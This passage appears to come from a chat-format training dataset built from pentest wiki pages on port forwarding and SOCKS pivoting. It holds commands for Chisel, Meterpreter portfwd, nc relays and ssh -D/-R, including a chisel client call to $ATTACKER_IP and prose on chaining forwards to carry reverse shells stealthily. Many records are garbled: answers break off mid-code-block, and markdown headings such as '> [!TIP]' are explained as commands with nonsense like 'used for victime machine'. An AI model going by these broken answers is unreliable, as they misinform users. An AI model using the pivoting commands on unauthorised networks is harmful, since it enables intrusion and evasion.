forwarding, along with the ports and addresses to bind.\n* the -p option for a remote port forwarding, along with the ports and addresses to bind.\n* the -r option for the targeted remote machine IP address.\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Victime machine", "response": ".\\chisel.exe client $ATTACKER_IP:$ATTACKER_PORT R:$REMOTE_PORT:localhost:$LOCAL_PORT\n``\n\n> [!TIP]\n> Chisel binaries can be downloaded from the official GitHub repository.\n\n=== Metasploit\n\nMeterpreter features built in port forwarding capabilities with the portfwd cmdlet.\n\n* the -l option for a local port forwarding, along with the ports and addresses to bind.\n* the -p option for a remote port forwarding, along with the ports and addresses to bind.\n* the -r option for the targeted remote machine IP address.\n\n``bash", "metadata": {"corpus_index": 1388, "category": "network", "source_file": "docs/src/infra/pivoting/port-forwarding.md", "page_title": "🛠️ Port forwarding", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Victime machine"}, {"role": "assistant", "content": "> [!TIP]\n> Chisel binaries can be downloaded from [the official GitHub repository](https://github.com/jpillora/chisel/releases).\n\n\n=== Metasploit\n\nMeterpreter features built in port forwarding capabilities with the `portfwd` cmdlet.\n\n* the `-l` option for a local port forwarding, along with the ports and addresses to bind.\n* the `-p` option for a remote port forwarding, along with the ports and addresses to bind.\n* the `-r` option for the targeted remote machine IP address."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Victime machine", "response": "> [!TIP]\n> Chisel binaries can be downloaded from [the official GitHub repository](https://github.com/jpillora/chisel/releases).\n\n\n=== Metasploit\n\nMeterpreter features built in port forwarding capabilities with the `portfwd` cmdlet.\n\n* the `-l` option for a local port forwarding, along with the ports and addresses to bind.\n* the `-p` option for a remote port forwarding, along with the ports and addresses to bind.\n* the `-r` option for the targeted remote machine IP address.", "metadata": {"corpus_index": 1389, "category": "network", "source_file": "docs/src/infra/pivoting/port-forwarding.md", "page_title": "🛠️ Port forwarding", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `> [!TIP]`?"}, {"role": "assistant", "content": "This command is used for victime machine. Victime machine"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `> [!TIP]`?", "response": "This command is used for victime machine. Victime machine", "metadata": {"corpus_index": 1389, "category": "network", "source_file": "docs/src/infra/pivoting/port-forwarding.md", "page_title": "🛠️ Port forwarding", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Add port forward"}, {"role": "assistant", "content": "portfwd add –l $LOCAL_PORT –p $REMOTE_PORT –r $REMOTE_ADDRESS"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Add port forward", "response": "portfwd add –l $LOCAL_PORT –p $REMOTE_PORT –r $REMOTE_ADDRESS", "metadata": {"corpus_index": 1390, "category": "network", "source_file": "docs/src/infra/pivoting/port-forwarding.md", "page_title": "🛠️ Port forwarding", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Add port forward"}, {"role": "assistant", "content": "portfwd add –l $LOCAL_PORT –p $REMOTE_PORT –r $REMOTE_ADDRESS"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Add port forward", "response": "portfwd add –l $LOCAL_PORT –p $REMOTE_PORT –r $REMOTE_ADDRESS", "metadata": {"corpus_index": 1390, "category": "network", "source_file": "docs/src/infra/pivoting/port-forwarding.md", "page_title": "🛠️ Port forwarding", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Delete port forwarded in the context of penetration testing"}, {"role": "assistant", "content": "portfwd delete –l $LOCAL_PORT –p $REMOTE_PORT –r $REMOTE_ADDRESS"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Delete port forwarded in the context of penetration testing", "response": "portfwd delete –l $LOCAL_PORT –p $REMOTE_PORT –r $REMOTE_ADDRESS", "metadata": {"corpus_index": 1391, "category": "network", "source_file": "docs/src/infra/pivoting/port-forwarding.md", "page_title": "🛠️ Port forwarding", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Delete port forwarded?"}, {"role": "assistant", "content": "portfwd delete –l $LOCAL_PORT –p $REMOTE_PORT –r $REMOTE_ADDRESS"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Delete port forwarded?", "response": "portfwd delete –l $LOCAL_PORT –p $REMOTE_PORT –r $REMOTE_ADDRESS", "metadata": {"corpus_index": 1391, "category": "network", "source_file": "docs/src/infra/pivoting/port-forwarding.md", "page_title": "🛠️ Port forwarding", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Remove all port forwarded?"}, {"role": "assistant", "content": "portfwd flush\n``\n\n=== plink\n\nTODO\n\n=== nc\n\nFrom a UNIX-like host, the nc utility can be used to setup local port forwarding.\n\n`bash\nnc -lvk $LOCAL_ADDRESS $LOCAL_PORT -c \"nc -v $REMOTE_ADDRESS $REMOTE_PORT\"\n`\n\n=== ngrok\n\nNgrok (Go) is a tool that allows to expose a local web server to the Internet. Upon command execution, the tool will output the Internet-facing address that's configured for port forwarding to the local service.\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Remove all port forwarded?", "response": "portfwd flush\n``\n\n=== plink\n\nTODO\n\n=== nc\n\nFrom a UNIX-like host, the nc utility can be used to setup local port forwarding.\n\n`bash\nnc -lvk $LOCAL_ADDRESS $LOCAL_PORT -c \"nc -v $REMOTE_ADDRESS $REMOTE_PORT\"\n`\n\n=== ngrok\n\nNgrok (Go) is a tool that allows to expose a local web server to the Internet. Upon command execution, the tool will output the Internet-facing address that's configured for port forwarding to the local service.\n\n``bash", "metadata": {"corpus_index": 1392, "category": "network", "source_file": "docs/src/infra/pivoting/port-forwarding.md", "page_title": "🛠️ Port forwarding", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Remove all port forwarded?"}, {"role": "assistant", "content": "portfwd flush\n``\n\n=== plink\n\nTODO\n\n=== nc\n\nFrom a UNIX-like host, the nc utility can be used to setup local port forwarding.\n\n`bash\nnc -lvk $LOCAL_ADDRESS $LOCAL_PORT -c \"nc -v $REMOTE_ADDRESS $REMOTE_PORT\"\n`\n\n=== ngrok\n\nNgrok (Go) is a tool that allows to expose a local web server to the Internet. Upon command execution, the tool will output the Internet-facing address that's configured for port forwarding to the local service.\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Remove all port forwarded?", "response": "portfwd flush\n``\n\n=== plink\n\nTODO\n\n=== nc\n\nFrom a UNIX-like host, the nc utility can be used to setup local port forwarding.\n\n`bash\nnc -lvk $LOCAL_ADDRESS $LOCAL_PORT -c \"nc -v $REMOTE_ADDRESS $REMOTE_PORT\"\n`\n\n=== ngrok\n\nNgrok (Go) is a tool that allows to expose a local web server to the Internet. Upon command execution, the tool will output the Internet-facing address that's configured for port forwarding to the local service.\n\n``bash", "metadata": {"corpus_index": 1392, "category": "network", "source_file": "docs/src/infra/pivoting/port-forwarding.md", "page_title": "🛠️ Port forwarding", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Remove all port forwarded"}, {"role": "assistant", "content": "=== plink\n\nTODO\n\n\n=== nc\n\nFrom a UNIX-like host, the `nc` utility can be used to setup local port forwarding."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Remove all port forwarded", "response": "=== plink\n\nTODO\n\n\n=== nc\n\nFrom a UNIX-like host, the `nc` utility can be used to setup local port forwarding.", "metadata": {"corpus_index": 1393, "category": "network", "source_file": "docs/src/infra/pivoting/port-forwarding.md", "page_title": "🛠️ Port forwarding", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== plink`?"}, {"role": "assistant", "content": "This command is used for remove all port forwarded. Remove all port forwarded"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== plink`?", "response": "This command is used for remove all port forwarded. Remove all port forwarded", "metadata": {"corpus_index": 1393, "category": "network", "source_file": "docs/src/infra/pivoting/port-forwarding.md", "page_title": "🛠️ Port forwarding", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Remove all port forwarded?"}, {"role": "assistant", "content": "=== ngrok\n\n[Ngrok](https://github.com/inconshreveable/ngrok) (Go) is a tool that allows to expose a local web server to the Internet. Upon command execution, the tool will output the Internet-facing address that's configured for port forwarding to the local service."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Remove all port forwarded?", "response": "=== ngrok\n\n[Ngrok](https://github.com/inconshreveable/ngrok) (Go) is a tool that allows to expose a local web server to the Internet. Upon command execution, the tool will output the Internet-facing address that's configured for port forwarding to the local service.", "metadata": {"corpus_index": 1394, "category": "network", "source_file": "docs/src/infra/pivoting/port-forwarding.md", "page_title": "🛠️ Port forwarding", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== ngrok`?"}, {"role": "assistant", "content": "This command is used for remove all port forwarded. Remove all port forwarded"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== ngrok`?", "response": "This command is used for remove all port forwarded. Remove all port forwarded", "metadata": {"corpus_index": 1394, "category": "network", "source_file": "docs/src/infra/pivoting/port-forwarding.md", "page_title": "🛠️ Port forwarding", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain 🛠️ Port forwarding - Chained local port forwarding"}, {"role": "assistant", "content": "In the following example (real-world badly secured network), let's assume the remote attacker wants to access a internal workstation's web service (i.e. localhost), and that the attackers controls multiple machines that can bridge the multiple networks at play.\n\n![](<./assets/Chained local port forwarding diagram.png>)\n\n![](<./assets/Chained local port forwarding commands.png>)\n\nThis setup allows the attackers to connect to the workstation web-service on port 80/TCP by targeting port 1111/TCP on his own machine. His machine will forward the communication to pivot1's port 2222/TCP. Pivot1 will forward to pivot2's 3333/TCP. Pivot2 will forward to workstation's 80/TCP."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain 🛠️ Port forwarding - Chained local port forwarding", "response": "In the following example (real-world badly secured network), let's assume the remote attacker wants to access a internal workstation's web service (i.e. localhost), and that the attackers controls multiple machines that can bridge the multiple networks at play.\n\n![](<./assets/Chained local port forwarding diagram.png>)\n\n![](<./assets/Chained local port forwarding commands.png>)\n\nThis setup allows the attackers to connect to the workstation web-service on port 80/TCP by targeting port 1111/TCP on his own machine. His machine will forward the communication to pivot1's port 2222/TCP. Pivot1 will forward to pivot2's 3333/TCP. Pivot2 will forward to workstation's 80/TCP.", "metadata": {"corpus_index": 1395, "category": "network", "source_file": "docs/src/infra/pivoting/port-forwarding.md", "page_title": "🛠️ Port forwarding", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do 🛠️ Port forwarding - Chained local port forwarding"}, {"role": "assistant", "content": "In the following example (real-world badly secured network), let's assume the remote attacker wants to access a internal workstation's web service (i.e. localhost), and that the attackers controls multiple machines that can bridge the multiple networks at play.\n\n![](<./assets/Chained local port forwarding diagram.png>)\n\n![](<./assets/Chained local port forwarding commands.png>)\n\nThis setup allows the attackers to connect to the workstation web-service on port 80/TCP by targeting port 1111/TCP on his own machine. His machine will forward the communication to pivot1's port 2222/TCP. Pivot1 will forward to pivot2's 3333/TCP. Pivot2 will forward to workstation's 80/TCP."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do 🛠️ Port forwarding - Chained local port forwarding", "response": "In the following example (real-world badly secured network), let's assume the remote attacker wants to access a internal workstation's web service (i.e. localhost), and that the attackers controls multiple machines that can bridge the multiple networks at play.\n\n![](<./assets/Chained local port forwarding diagram.png>)\n\n![](<./assets/Chained local port forwarding commands.png>)\n\nThis setup allows the attackers to connect to the workstation web-service on port 80/TCP by targeting port 1111/TCP on his own machine. His machine will forward the communication to pivot1's port 2222/TCP. Pivot1 will forward to pivot2's 3333/TCP. Pivot2 will forward to workstation's 80/TCP.", "metadata": {"corpus_index": 1395, "category": "network", "source_file": "docs/src/infra/pivoting/port-forwarding.md", "page_title": "🛠️ Port forwarding", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does 🛠️ Port forwarding - Chained remote port forwarding work?"}, {"role": "assistant", "content": "In the following example (real-world badly secured network), let's assume the remote attacker wants a target workstation to connect back to him with a reverse shell, and that the attackers controls multiple machines that can bridge the multiple networks at play. There are multiple scenarios where using a combination of remote port forwarding would be interesting or even required.\n\n* the attacker wants to stay stealthy by using multiple specific hops to make the traffic legitimate-looking (workstation communicates with an internal server, an internal server communicates with a DMZed server, a DMZed server communicates with a remote client)\n* the target workstation doesn't have access to the remote attacker's network (i.e. to the Internet)\n\n![](<./assets/Chained remote port forwarding diagram.png>)\n\n![](<./assets/Chained remote port forwarding commands.png>)\n\nThis setup allows the target workstation to communicate with the attacker's port 1111/TCP by targeting pivot2 on port 3333/TCP. Pivot2 will forward the communication to pivot1's port 2222/TCP which will itself forward to attacker's port 1111/TCP.\n\n> [!TIP]\n> If ports are only opened on the loopback interface, testers should make sure the /etc/ssh/sshd_config has the GatewayPorts option set to yes or clientspecified."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does 🛠️ Port forwarding - Chained remote port forwarding work?", "response": "In the following example (real-world badly secured network), let's assume the remote attacker wants a target workstation to connect back to him with a reverse shell, and that the attackers controls multiple machines that can bridge the multiple networks at play. There are multiple scenarios where using a combination of remote port forwarding would be interesting or even required.\n\n* the attacker wants to stay stealthy by using multiple specific hops to make the traffic legitimate-looking (workstation communicates with an internal server, an internal server communicates with a DMZed server, a DMZed server communicates with a remote client)\n* the target workstation doesn't have access to the remote attacker's network (i.e. to the Internet)\n\n![](<./assets/Chained remote port forwarding diagram.png>)\n\n![](<./assets/Chained remote port forwarding commands.png>)\n\nThis setup allows the target workstation to communicate with the attacker's port 1111/TCP by targeting pivot2 on port 3333/TCP. Pivot2 will forward the communication to pivot1's port 2222/TCP which will itself forward to attacker's port 1111/TCP.\n\n> [!TIP]\n> If ports are only opened on the loopback interface, testers should make sure the /etc/ssh/sshd_config has the GatewayPorts option set to yes or clientspecified.", "metadata": {"corpus_index": 1396, "category": "network", "source_file": "docs/src/infra/pivoting/port-forwarding.md", "page_title": "🛠️ Port forwarding", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do 🛠️ Port forwarding - Chained remote port forwarding"}, {"role": "assistant", "content": "In the following example (real-world badly secured network), let's assume the remote attacker wants a target workstation to connect back to him with a reverse shell, and that the attackers controls multiple machines that can bridge the multiple networks at play. There are multiple scenarios where using a combination of remote port forwarding would be interesting or even required.\n\n* the attacker wants to stay stealthy by using multiple specific hops to make the traffic legitimate-looking (workstation communicates with an internal server, an internal server communicates with a DMZed server, a DMZed server communicates with a remote client)\n* the target workstation doesn't have access to the remote attacker's network (i.e. to the Internet)\n\n![](<./assets/Chained remote port forwarding diagram.png>)\n\n![](<./assets/Chained remote port forwarding commands.png>)\n\nThis setup allows the target workstation to communicate with the attacker's port 1111/TCP by targeting pivot2 on port 3333/TCP. Pivot2 will forward the communication to pivot1's port 2222/TCP which will itself forward to attacker's port 1111/TCP.\n\n> [!TIP]\n> If ports are only opened on the loopback interface, testers should make sure the /etc/ssh/sshd_config has the GatewayPorts option set to yes or clientspecified."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do 🛠️ Port forwarding - Chained remote port forwarding", "response": "In the following example (real-world badly secured network), let's assume the remote attacker wants a target workstation to connect back to him with a reverse shell, and that the attackers controls multiple machines that can bridge the multiple networks at play. There are multiple scenarios where using a combination of remote port forwarding would be interesting or even required.\n\n* the attacker wants to stay stealthy by using multiple specific hops to make the traffic legitimate-looking (workstation communicates with an internal server, an internal server communicates with a DMZed server, a DMZed server communicates with a remote client)\n* the target workstation doesn't have access to the remote attacker's network (i.e. to the Internet)\n\n![](<./assets/Chained remote port forwarding diagram.png>)\n\n![](<./assets/Chained remote port forwarding commands.png>)\n\nThis setup allows the target workstation to communicate with the attacker's port 1111/TCP by targeting pivot2 on port 3333/TCP. Pivot2 will forward the communication to pivot1's port 2222/TCP which will itself forward to attacker's port 1111/TCP.\n\n> [!TIP]\n> If ports are only opened on the loopback interface, testers should make sure the /etc/ssh/sshd_config has the GatewayPorts option set to yes or clientspecified.", "metadata": {"corpus_index": 1396, "category": "network", "source_file": "docs/src/infra/pivoting/port-forwarding.md", "page_title": "🛠️ Port forwarding", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about 🛠️ SOCKS proxy - Theory"}, {"role": "assistant", "content": "SOCKS (SOCKet Secure) is a network protocol that allows users to route network traffic to a server on a client's behalf. SOCKS is between the application and the transport layer of the OSI model.\n\nThis is especially useful for penetration testing engagements where a target is hiding behind one or multiple firewalls. A compromised server connected to two networks can be used as a SOCKS proxy server to pivot from a network to another.\n\nIn short, a SOCKS proxy can relay TCP and UDP connections and hence help bypass network segmentation. It's sort a dynamic port forwarding technique."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about 🛠️ SOCKS proxy - Theory", "response": "SOCKS (SOCKet Secure) is a network protocol that allows users to route network traffic to a server on a client's behalf. SOCKS is between the application and the transport layer of the OSI model.\n\nThis is especially useful for penetration testing engagements where a target is hiding behind one or multiple firewalls. A compromised server connected to two networks can be used as a SOCKS proxy server to pivot from a network to another.\n\nIn short, a SOCKS proxy can relay TCP and UDP connections and hence help bypass network segmentation. It's sort a dynamic port forwarding technique.", "metadata": {"corpus_index": 1397, "category": "network", "source_file": "docs/src/infra/pivoting/socks-proxy.md", "page_title": "🛠️ SOCKS proxy", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for 🛠️ SOCKS proxy - Theory?"}, {"role": "assistant", "content": "SOCKS (SOCKet Secure) is a network protocol that allows users to route network traffic to a server on a client's behalf. SOCKS is between the application and the transport layer of the OSI model.\n\nThis is especially useful for penetration testing engagements where a target is hiding behind one or multiple firewalls. A compromised server connected to two networks can be used as a SOCKS proxy server to pivot from a network to another.\n\nIn short, a SOCKS proxy can relay TCP and UDP connections and hence help bypass network segmentation. It's sort a dynamic port forwarding technique."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for 🛠️ SOCKS proxy - Theory?", "response": "SOCKS (SOCKet Secure) is a network protocol that allows users to route network traffic to a server on a client's behalf. SOCKS is between the application and the transport layer of the OSI model.\n\nThis is especially useful for penetration testing engagements where a target is hiding behind one or multiple firewalls. A compromised server connected to two networks can be used as a SOCKS proxy server to pivot from a network to another.\n\nIn short, a SOCKS proxy can relay TCP and UDP connections and hence help bypass network segmentation. It's sort a dynamic port forwarding technique.", "metadata": {"corpus_index": 1397, "category": "network", "source_file": "docs/src/infra/pivoting/socks-proxy.md", "page_title": "🛠️ SOCKS proxy", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is 🛠️ SOCKS proxy - Practice?"}, {"role": "assistant", "content": "There are two types of dynamic port forwarding used during penetration testing engagements.\n\n* Dynamic port forwarding: tunnel the whole attacker's network traffic (instead of only one port) through a remote machine.\n* Reverse dynamic port forwarding: tunnel the whole network traffic from a remote machine through the attacker's machine."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is 🛠️ SOCKS proxy - Practice?", "response": "There are two types of dynamic port forwarding used during penetration testing engagements.\n\n* Dynamic port forwarding: tunnel the whole attacker's network traffic (instead of only one port) through a remote machine.\n* Reverse dynamic port forwarding: tunnel the whole network traffic from a remote machine through the attacker's machine.", "metadata": {"corpus_index": 1398, "category": "network", "source_file": "docs/src/infra/pivoting/socks-proxy.md", "page_title": "🛠️ SOCKS proxy", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for 🛠️ SOCKS proxy - Practice?"}, {"role": "assistant", "content": "There are two types of dynamic port forwarding used during penetration testing engagements.\n\n* Dynamic port forwarding: tunnel the whole attacker's network traffic (instead of only one port) through a remote machine.\n* Reverse dynamic port forwarding: tunnel the whole network traffic from a remote machine through the attacker's machine."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for 🛠️ SOCKS proxy - Practice?", "response": "There are two types of dynamic port forwarding used during penetration testing engagements.\n\n* Dynamic port forwarding: tunnel the whole attacker's network traffic (instead of only one port) through a remote machine.\n* Reverse dynamic port forwarding: tunnel the whole network traffic from a remote machine through the attacker's machine.", "metadata": {"corpus_index": 1398, "category": "network", "source_file": "docs/src/infra/pivoting/socks-proxy.md", "page_title": "🛠️ SOCKS proxy", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about 🛠️ SOCKS proxy - Basic server setup"}, {"role": "assistant", "content": "> [!TIP]\n> While setting up port forwarding, it's important to remember that non-admin users can only open ports above 1024.\n\nIn practice, there are many ways to turn a controlled machine into a SOCKS proxy server.\n\n::: tabs\n\n=== SSH commands\n\nOne of the most easy is by relying on SSH, however, it requires to have an SSH server running on the controlled machine and a valid account. The tester needs to open an SSH connection to the machine that should be turned into a SOCKS proxy, and supply the -D option along with the port to use for tunneling. The command can also be used with -N option to make sure no command gets executed after the SSH session is opened.\n\n``bash\nssh -N -D $PORT $CONTROLLED_TARGET\n`\n\nOnce the ssh command exits successful (or once a session opens) the tester can then proceed to the usage part. \n\nA reverse dynamic port forwarding can be also put in place to tunnel a machine's traffic through the attacker machine. It is implemented entirely in the client (i.e. the server does not need to be updated) (since OpenSSH 7.6).\n\n`bash\nssh -N -R $PORT $CONTROLLED_TARGET\n`\n\n=== Chisel\n\nChisel is a standalone binary for pivoting on Linux and Windows systems.\n\nWorking on a server/client, the binary simply needs to be uploaded on the victim host and executed as server on the attacker machine.\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about 🛠️ SOCKS proxy - Basic server setup", "response": "> [!TIP]\n> While setting up port forwarding, it's important to remember that non-admin users can only open ports above 1024.\n\nIn practice, there are many ways to turn a controlled machine into a SOCKS proxy server.\n\n::: tabs\n\n=== SSH commands\n\nOne of the most easy is by relying on SSH, however, it requires to have an SSH server running on the controlled machine and a valid account. The tester needs to open an SSH connection to the machine that should be turned into a SOCKS proxy, and supply the -D option along with the port to use for tunneling. The command can also be used with -N option to make sure no command gets executed after the SSH session is opened.\n\n``bash\nssh -N -D $PORT $CONTROLLED_TARGET\n`\n\nOnce the ssh command exits successful (or once a session opens) the tester can then proceed to the usage part. \n\nA reverse dynamic port forwarding can be also put in place to tunnel a machine's traffic through the attacker machine. It is implemented entirely in the client (i.e. the server does not need to be updated) (since OpenSSH 7.6).\n\n`bash\nssh -N -R $PORT $CONTROLLED_TARGET\n`\n\n=== Chisel\n\nChisel is a standalone binary for pivoting on Linux and Windows systems.\n\nWorking on a server/client, the binary simply needs to be uploaded on the victim host and executed as server on the attacker machine.\n\n``bash", "metadata": {"corpus_index": 1399, "category": "network", "source_file": "docs/src/infra/pivoting/socks-proxy.md", "page_title": "🛠️ SOCKS proxy", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do 